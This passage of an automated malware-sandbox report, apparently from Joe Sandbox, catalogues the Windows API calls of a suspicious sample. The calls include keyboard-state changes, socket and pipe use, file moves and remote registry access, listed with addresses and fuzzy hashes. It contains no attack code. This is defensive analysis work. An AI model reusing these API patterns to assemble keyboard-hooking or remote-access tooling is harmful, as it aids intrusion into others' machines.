                            • Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007922E3
                            • Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                          • String ID:
                          • API String ID: 4196846111-0
                          • Opcode ID: df17f709c7f30f52c34446dccfd7cdeaaa45a6888dfa250d8c7eb8fb9a9ae67c
                          • Instruction ID: c02da691e3880042b75ef810b8381c8a7299fce56361038d4af54761d0493522
                          • Opcode Fuzzy Hash: df17f709c7f30f52c34446dccfd7cdeaaa45a6888dfa250d8c7eb8fb9a9ae67c
                          • Instruction Fuzzy Hash: 21715E75A00205EFCF15EF64D845AAEB7F5FF48310F158459E816EB352DB38AD428B90
                          APIs
                          • GetParent.USER32(?), ref: 0076AEF9
                          • GetKeyboardState.USER32(?), ref: 0076AF0E
                          • SetKeyboardState.USER32(?), ref: 0076AF6F
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0076AF9D
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0076AFBC
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0076AFFD
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0076B020
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 83b52e91c038923cc1081deaac57c98e248eb650b1b3fd8534e5b6aba425f987
                          • Instruction ID: 38061849984ea82d457facf333d4095ea81d26e52839b3df763786fe5f66a104
                          • Opcode Fuzzy Hash: 83b52e91c038923cc1081deaac57c98e248eb650b1b3fd8534e5b6aba425f987
                          • Instruction Fuzzy Hash: E951B3A0A047D53DFB3642348C45BBA7EE96B06304F088589F9D6A54C3D3ADECC8DB52
                          APIs
                          • GetParent.USER32(00000000), ref: 0076AD19
                          • GetKeyboardState.USER32(?), ref: 0076AD2E
                          • SetKeyboardState.USER32(?), ref: 0076AD8F
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0076ADBB
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0076ADD8
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0076AE17
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0076AE38
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: fb4257d74755fe0b486cf08a0090c690ab8b9fa7343b5e664331cdfdc5436bdd
                          • Instruction ID: 6a6fab3277803ee8febed0b741f77a8699fb2f951c94c90773093c111336971f
                          • Opcode Fuzzy Hash: fb4257d74755fe0b486cf08a0090c690ab8b9fa7343b5e664331cdfdc5436bdd
                          • Instruction Fuzzy Hash: CD51D6B16047D53DFB3783348C96B7A7EE86B46300F088589E5D6668C2D39DEC84DB62
                          APIs
                          • GetConsoleCP.KERNEL32(00743CD6,?,?,?,?,?,?,?,?,00735BA3,?,?,00743CD6,?,?), ref: 00735470
                          • __fassign.LIBCMT ref: 007354EB
                          • __fassign.LIBCMT ref: 00735506
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00743CD6,00000005,00000000,00000000), ref: 0073552C
                          • WriteFile.KERNEL32(?,00743CD6,00000000,00735BA3,00000000,?,?,?,?,?,?,?,?,?,00735BA3,?), ref: 0073554B
                          • WriteFile.KERNEL32(?,?,00000001,00735BA3,00000000,?,?,?,?,?,?,?,?,?,00735BA3,?), ref: 00735584
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: afac1b2e4488387c438565d641b8b2be129364a09d1d5a2199b2825f9d4e9621
                          • Instruction ID: 87f9fa225ae789eb4890d3a1874c91534ba8984b1d42f21f0913e5e24a915642
                          • Opcode Fuzzy Hash: afac1b2e4488387c438565d641b8b2be129364a09d1d5a2199b2825f9d4e9621
                          • Instruction Fuzzy Hash: 4951D6709006499FEF11CFA8D845AEEBBFAEF08300F14451AF555E7292E734AA51CB64
                          APIs
                            • Part of subcall function 0078304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0078307A
                            • Part of subcall function 0078304E: _wcslen.LIBCMT ref: 0078309B
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00781112
                          • WSAGetLastError.WSOCK32 ref: 00781121
                          • WSAGetLastError.WSOCK32 ref: 007811C9
                          • closesocket.WSOCK32(00000000), ref: 007811F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 2675159561-0
                          • Opcode ID: 613885c8a55c78b3e7bc4c1ba64b11dd8d3abdf6e13c1ead75a50e92e894f141
                          • Instruction ID: a5c8a2407afab7c99b07a49fe6686a3c209f730ee094fd908448eafd70813fe6
                          • Opcode Fuzzy Hash: 613885c8a55c78b3e7bc4c1ba64b11dd8d3abdf6e13c1ead75a50e92e894f141
                          • Instruction Fuzzy Hash: C541E531A00208EFDB11AF54CC88BA9B7E9EF45364F548159FD159B291C778ED42CBE1
                          APIs
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0076CF22,?), ref: 0076DDFD
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0076CF22,?), ref: 0076DE16
                          • lstrcmpiW.KERNEL32(?,?), ref: 0076CF45
                          • MoveFileW.KERNEL32(?,?), ref: 0076CF7F
                          • _wcslen.LIBCMT ref: 0076D005
                          • _wcslen.LIBCMT ref: 0076D01B
                          • SHFileOperationW.SHELL32(?), ref: 0076D061
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                          • String ID: \*.*
                          • API String ID: 3164238972-1173974218
                          • Opcode ID: a31319cc12bf3a3c1b9cbad2caedf022ab882e4d027cfc00099763845dc336bb
                          • Instruction ID: ee4e20eb40895ec412b8c3cf5ec803f99d8f593502c14c3306f20c78547e1f2b
                          • Opcode Fuzzy Hash: a31319cc12bf3a3c1b9cbad2caedf022ab882e4d027cfc00099763845dc336bb
                          • Instruction Fuzzy Hash: C1415772D45118DFDF17EBA4D985AEEB7B9AF08380F0400E6E546E7141EB38AA85CB50
                          APIs
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00792E1C
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00792E4F
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00792E84
                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00792EB6
                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00792EE0
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00792EF1
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00792F0B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: d62fb6fe19a55d69c8a31a47a5a84cdcd25bf12174366ecfddbbb910f09393cd
                          • Instruction ID: 9b81114319757fa9c3182780e653615d8fc38ca14d53f91808aa87099f4393c5
                          • Opcode Fuzzy Hash: d62fb6fe19a55d69c8a31a47a5a84cdcd25bf12174366ecfddbbb910f09393cd
                          • Instruction Fuzzy Hash: 18311235605240AFEF21EF18ECD8F6537E1EB8A710F5541A6F9008B2B2CB79A842DB54
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767769
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0076778F
                          • SysAllocString.OLEAUT32(00000000), ref: 00767792
                          • SysAllocString.OLEAUT32(?), ref: 007677B0
                          • SysFreeString.OLEAUT32(?), ref: 007677B9
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007677DE
                          • SysAllocString.OLEAUT32(?), ref: 007677EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: f42397510e815b9927739169ad917b586554c6813475f1f09a33d0510e7b8d1d
                          • Instruction ID: 82e9e613b198c458651b086f0c10739708f55113cc1c9279bb6a8b08fc0a81e1
                          • Opcode Fuzzy Hash: f42397510e815b9927739169ad917b586554c6813475f1f09a33d0510e7b8d1d
                          • Instruction Fuzzy Hash: 1E21A476604219AFDF14DFA8CD88CBB77ACEB097A87048026FD15DB1A0D678DC46C764
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767842
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767868
                          • SysAllocString.OLEAUT32(00000000), ref: 0076786B
                          • SysAllocString.OLEAUT32 ref: 0076788C
                          • SysFreeString.OLEAUT32 ref: 00767895
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007678AF
                          • SysAllocString.OLEAUT32(?), ref: 007678BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: f047e9579936bb62de137893d3725b76fcb83e8f42ecc1cd689795639cf6e3fe
                          • Instruction ID: 3c4e39ace994e4506a9051f4e89494a09035c0acaeb937cb69d78239e7a14568
                          • Opcode Fuzzy Hash: f047e9579936bb62de137893d3725b76fcb83e8f42ecc1cd689795639cf6e3fe
                          • Instruction Fuzzy Hash: 16218371608205AFDF159FB8DC8CDBA77ECEB097A47108125F916CB2A1D678DC81CB68
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 007704F2
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0077052E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: 393eefed977f07443e1da7fd0f0839726d6be4a1ac14c9049cb77de0d6e13f04
                          • Instruction ID: 08b1348864056007d19c232c1d54f191e9ffc4479ebf9d4d99c8d90572391ade
                          • Opcode Fuzzy Hash: 393eefed977f07443e1da7fd0f0839726d6be4a1ac14c9049cb77de0d6e13f04
                          • Instruction Fuzzy Hash: 1D218071500305EBDF208F29DC48EAA7BA4BF447A4F208A19F8A5D62E0D7749961CFA0
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 007705C6
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00770601
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: cf9a7c2043555fa2313a3f5afc306594ce3ae1e146afdf7260f1724c46454160
                          • Instruction ID: ac21eb5a40579afe1ddfcee62530e6b7bf31fe43ab2b60646ece80bd767b2e7b
                          • Opcode Fuzzy Hash: cf9a7c2043555fa2313a3f5afc306594ce3ae1e146afdf7260f1724c46454160
                          • Instruction Fuzzy Hash: D821E275500305DBDF208F68CC58A9A77F4BF817A4F208B1AF8A5E32E0D7749861CBA4
                          APIs
                            • Part of subcall function 0070600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
                            • Part of subcall function 0070600E: GetStockObject.GDI32(00000011), ref: 00706060
                            • Part of subcall function 0070600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00794112
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0079411F
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0079412A
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00794139
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00794145
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 31c1d960b0f7fe293cb14e9f6f54f6910cebc974319be4a96ccd02b248e8f6f1
                          • Instruction ID: 071d2feac6439bcdefa54fb2b79bb614369b080eded4cb0fd1a915324d38f903
                          • Opcode Fuzzy Hash: 31c1d960b0f7fe293cb14e9f6f54f6910cebc974319be4a96ccd02b248e8f6f1
                          • Instruction Fuzzy Hash: 8611B6B214011DBEEF119F64CC85EE77F9DEF08798F004111B618A2050C6769C21DBA4
                          APIs
                            • Part of subcall function 0073D7A3: _free.LIBCMT ref: 0073D7CC
                          • _free.LIBCMT ref: 0073D82D
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073D838
                          • _free.LIBCMT ref: 0073D843
                          • _free.LIBCMT ref: 0073D897
                          • _free.LIBCMT ref: 0073D8A2
                          • _free.LIBCMT ref: 0073D8AD
                          • _free.LIBCMT ref: 0073D8B8
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction ID: fc3db54e2e92da4916d785b2e6e36beaa2d6b9f440e9d37746bb7a850f88d83e
                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction Fuzzy Hash: 95111F71940B14EAF531BFB0EC4BFCB7BDC6F04700F404825B699A65A3DB69B9064A50
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0076DA74
                          • LoadStringW.USER32(00000000), ref: 0076DA7B
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0076DA91
                          • LoadStringW.USER32(00000000), ref: 0076DA98
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0076DADC
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 0076DAB9
                          Similarity
                          • API ID: HandleLoadModuleString$Message
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 4072794657-3128320259
                          • Opcode ID: 69addeb2120887efefea288a6b628b731506ca1e4bbf5d25079a6f7a538bba93
                          • Instruction ID: 4ee65b4c91f294eaa2fecd41a5e0bdc6a2314772055f65702d922af6b517344e
                          • Opcode Fuzzy Hash: 69addeb2120887efefea288a6b628b731506ca1e4bbf5d25079a6f7a538bba93
                          • Instruction Fuzzy Hash: 490112F69442087FEB11DBE49D89EE7776CE708701F408496B746E2041E6789E854F78
                          APIs
                          • InterlockedExchange.KERNEL32(0190FEF8,0190FEF8), ref: 0077097B
                          • EnterCriticalSection.KERNEL32(0190FED8,00000000), ref: 0077098D
                          • TerminateThread.KERNEL32(00000004,000001F6), ref: 0077099B
                          • WaitForSingleObject.KERNEL32(00000004,000003E8), ref: 007709A9
                          • CloseHandle.KERNEL32(00000004), ref: 007709B8
                          • InterlockedExchange.KERNEL32(0190FEF8,000001F6), ref: 007709C8
                          • LeaveCriticalSection.KERNEL32(0190FED8), ref: 007709CF
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 70873c22a785b7e3d114070329d23f6d0f946579c7b0f2ae0b42efc19a0c7d56
                          • Instruction ID: b46d8ffbe5f5d5b51bdd15562164278458cc08353932c754805ac2f44cd519fa
                          • Opcode Fuzzy Hash: 70873c22a785b7e3d114070329d23f6d0f946579c7b0f2ae0b42efc19a0c7d56
                          • Instruction Fuzzy Hash: 1FF0CD31442A12EBDF525BA4EE8DAD67A25BF05742F805016F201508A1C779A476CFA4
                          APIs
                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00781DC0
                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00781DE1
                          • WSAGetLastError.WSOCK32 ref: 00781DF2
                          • htons.WSOCK32(?,?,?,?,?), ref: 00781EDB
                          • inet_ntoa.WSOCK32(?), ref: 00781E8C
                            • Part of subcall function 007639E8: _strlen.LIBCMT ref: 007639F2
                            • Part of subcall function 00783224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0077EC0C), ref: 00783240
                          • _strlen.LIBCMT ref: 00781F35
                          Similarity
                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                          • String ID:
                          • API String ID: 3203458085-0
                          • Opcode ID: 5596c3b0154044bc120f197c1ee0e730f0a5a21a04fb971c17fe5527d6e62cda
                          • Instruction ID: c32e91c6deacc1e590a88580221e0676b1ad95dcdc31d2fd36eea58410482a16
                          • Opcode Fuzzy Hash: 5596c3b0154044bc120f197c1ee0e730f0a5a21a04fb971c17fe5527d6e62cda
                          • Instruction Fuzzy Hash: A1B1F431244340EFC724EF24C899E2A77E9AF84318F94864CF5565B2E2DB79ED42CB91
                          APIs
                          • __allrem.LIBCMT ref: 007300BA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007300D6
                          • __allrem.LIBCMT ref: 007300ED
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0073010B
                          • __allrem.LIBCMT ref: 00730122
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00730140
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                          • Instruction ID: bc37ed5ac64abc873799aa5e7834fe34111d83f61bb2db554f5433dce257f6c4
                          • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                          • Instruction Fuzzy Hash: 9F810676A0071AEBF724AE28DC55B6F73F8AF41724F24413AF551D6682E778D9008790
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007282D9,007282D9,?,?,?,0073644F,00000001,00000001,8BE85006), ref: 00736258
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0073644F,00000001,00000001,8BE85006,?,?,?), ref: 007362DE
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007363D8
                          • __freea.LIBCMT ref: 007363E5
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          • __freea.LIBCMT ref: 007363EE
                          • __freea.LIBCMT ref: 00736413
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 90b84c0a9d980d9d241e895d4ca23acb296a52b3b6842c400f5e3f8fb42a724f
                          • Instruction ID: d9c8d0e5bf1051d087a67660d5a8bdae5570f6c3b319a5135b9124d3c1324dd0
                          • Opcode Fuzzy Hash: 90b84c0a9d980d9d241e895d4ca23acb296a52b3b6842c400f5e3f8fb42a724f
                          • Instruction Fuzzy Hash: F651B172A00216BBFB258F64DC85EBF77A9EB44750F158629FD05D6142EB3CDC50C6A0
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078BCCA
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078BD25
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078BD6A
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0078BD99
